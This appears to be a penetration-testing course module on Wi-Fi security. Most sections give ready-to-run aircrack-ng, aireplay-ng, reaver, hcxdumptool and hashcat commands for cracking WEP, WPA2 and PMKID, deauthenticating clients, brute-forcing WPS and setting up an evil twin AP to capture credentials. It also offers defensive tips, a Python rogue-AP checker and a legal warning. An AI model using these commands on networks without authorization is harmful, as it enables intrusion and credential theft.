Introduction to Wireless Security
Wireless networks (Wi-Fi) are vulnerable to various attacks due to weak encryption, misconfigurations, and physical accessibility. This guide covers **reconnaissance, exploitation, and defense** techniques for **WEP, WPA/WPA2, and WPA3** networks.
1. Wireless Reconnaissance
A. Identifying Networks
- Scan for nearby networks:

```bash
sudo iwconfig                # List available interfaces
sudo airmon-ng start wlan0   # Enable monitor mode
sudo airodump-ng wlan0mon    # Scan networks
```
Key details:
- BSSID (MAC address of AP)
- ESSID (Network name)
- Channel, Encryption (WEP/WPA/WPA2)
B. Target Selection
- Prioritize weak networks:
  - WEP (Easily crackable)
  - WPA/WPA2-PSK (Vulnerable to brute force)
  - Open Wi-Fi (No encryption)
2. Wireless Attacks
A. WEP Cracking (Outdated but Still Found)
WEP uses RC4 encryption and is easily crackable due to IV (Initialization Vector) reuse.
Steps:
1. Capture packets:

```bash
sudo airodump-ng -c <channel> --bssid <BSSID> -w wep_crack wlan0mon
```

2. Force IV generation (ARP replay attack):

```bash
sudo aireplay-ng -3 -b <BSSID> -h <client_MAC> wlan0mon
```

3. Crack with aircrack-ng:

```bash
sudo aircrack-ng wep_crack-01.cap
```
B. WPA/WPA2 Cracking
WPA/WPA2-PSK (Pre-Shared Key) is vulnerable to brute force/dictionary attacks.
Steps:
1. Capture WPA handshake (4-way authentication):

```bash
sudo airodump-ng -c <channel> --bssid <BSSID> -w handshake wlan0mon
```

2. Deauthenticate a client to force reconnection:

```bash
sudo aireplay-ng -0 5 -a <BSSID> -c <client_MAC> wlan0mon
```

3. Crack with hashcat or aircrack-ng:

```bash
aircrack-ng -w rockyou.txt handshake-01.cap
```

or

```bash
hashcat -m 22000 handshake.hc22000 rockyou.txt
```
C. Evil Twin Attack (Rogue AP)
- Creates a fake Wi-Fi network to steal credentials.
Tools: airbase-ng, hostapd-wpe.
Steps:
1. Set up rogue AP:

```bash
sudo airbase-ng -a <BSSID> --essid "Free_WiFi" -c <channel> wlan0mon
```

2. Redirect traffic:

```bash
sudo dnschef -i <interface> --fakeip 192.168.1.1
```

3. Capture credentials when victims connect.
D. WPS (Wi-Fi Protected Setup) Attack
- WPS PIN brute force (if enabled).
Tools: reaver, bully.
Steps:

```bash
sudo reaver -i wlan0mon -b <BSSID> -vv -K 1
```
E. KRACK Attack (Key Reinstallation Attack)
- Exploits WPA2's 4-way handshake vulnerability.
Tool: krackattacks-scripts.
Steps:
1. Monitor network traffic.
2. Forge handshake packets to intercept data.
3. Advanced Attacks
A. PMKID Attack (WPA/WPA2)
- Extracts PMKID (Pairwise Master Key ID) without a client handshake.
Tools: hcxdumptool, hashcat.
Steps:
1. Capture PMKID:

```bash
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
```

2. Crack with hashcat:

```bash
hashcat -m 16800 pmkid.hc16800 rockyou.txt
```
B. WPA3 Downgrade Attack
- Forces WPA3 → WPA2 fallback.
Tool: dragonblood.
4. Defensive Measures
A. Securing Wi-Fi Networks
✔ Use WPA3-SAE (if available)
✔ Disable WPS (Vulnerable to brute force)
✔ Use strong passwords (Avoid dictionary words)
✔ Enable MAC filtering (Whitelist devices)
✔ Disable SSID broadcasting (Hidden network)
✔ Monitor for rogue APs (Airodump-ng, Kismet)
B. Detection Tools
- Wireshark (Analyze Wi-Fi traffic)
- Kismet (Wireless IDS)
- Aircrack-ng (Test security)
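As an added example (not part of the original guide), a small Python checker that turns the "monitor for rogue APs" and "avoid weak encryption" advice above into something automatable. It reads simplified airodump-ng-style scan rows (the sample data below is constructed, not a real capture) and compares them against an assumed inventory of authorized BSSIDs per ESSID, flagging open/WEP networks and any unknown AP advertising a managed ESSID (the evil-twin pattern from section 2C).

```python
from collections import defaultdict

# Constructed sample rows in the spirit of an airodump-ng CSV export
# (simplified to four columns). Not a real capture.
SAMPLE_SCAN = """\
BSSID, channel, Privacy, ESSID
00:11:22:33:44:55, 6, WPA2, CorpNet
66:77:88:99:AA:BB, 11, OPN, CorpNet
AA:BB:CC:DD:EE:01, 1, WEP, LegacyPrinter
AA:BB:CC:DD:EE:02, 6, WPA3, CorpNet-Secure
"""

# Assumed asset inventory: ESSID -> set of authorized BSSIDs (lowercase).
KNOWN_APS = {"CorpNet": {"00:11:22:33:44:55"}}

WEAK_PRIVACY = {"OPN", "WEP"}


def parse_scan(text):
    """Parse 'BSSID, channel, Privacy, ESSID' rows; skip header and blanks."""
    rows = []
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        bssid, channel, privacy, essid = [f.strip() for f in line.split(",")]
        rows.append({"bssid": bssid.lower(), "channel": int(channel),
                     "privacy": privacy.upper(), "essid": essid})
    return rows


def find_issues(rows, known=KNOWN_APS):
    """Return (kind, bssid, essid, privacy) tuples for weak or rogue APs."""
    issues = []
    by_essid = defaultdict(list)
    for r in rows:
        by_essid[r["essid"]].append(r)
        if r["privacy"] in WEAK_PRIVACY:
            issues.append(("weak-encryption", r["bssid"], r["essid"], r["privacy"]))
    # Any AP using a managed ESSID but an unlisted BSSID is a rogue candidate,
    # regardless of how strong its advertised encryption looks.
    for essid, aps in by_essid.items():
        for r in aps:
            if essid in known and r["bssid"] not in known[essid]:
                issues.append(("rogue-ap", r["bssid"], essid, r["privacy"]))
    return issues


if __name__ == "__main__":
    for issue in find_issues(parse_scan(SAMPLE_SCAN)):
        print("%-16s bssid=%s essid=%s privacy=%s" % issue)
```

In practice the inventory would come from the WLAN controller and the rows from a scheduled scan or a Kismet export; the same ESSID appearing with a weaker cipher than the managed AP is the signal to investigate first.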
5. Hands-On Lab
Lab: Cracking WPA2 with Aircrack-ng
1. Enable monitor mode:

```bash
sudo airmon-ng start wlan0
```

2. Scan networks:

```bash
sudo airodump-ng wlan0mon
```

3. Capture handshake:

```bash
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon
```

4. Deauth a client:

```bash
sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
```

5. Crack the handshake:

```bash
sudo aircrack-ng -w rockyou.txt capture-01.cap
```
6. Legal & Ethical Considerations
⚠ Only hack networks you own or have permission to test.
⚠ Unauthorized access is illegal (Computer Fraud and Abuse Act, etc.).
Conclusion
- WEP is trivial to crack (RC4 weakness).
- WPA/WPA2 is vulnerable to brute force (Weak passwords).
- WPA3 improves security but has downgrade risks.
- Evil Twin & WPS attacks are still effective.
🔹 Next Steps:
- Module 9: Social Engineering & Phishing
- Try Wi-Fi challenges on Hack The Box / TryHackMe.
- Learn RF hacking (Bluetooth, Zigbee).
- Explore enterprise Wi-Fi security (RADIUS, 802.1X).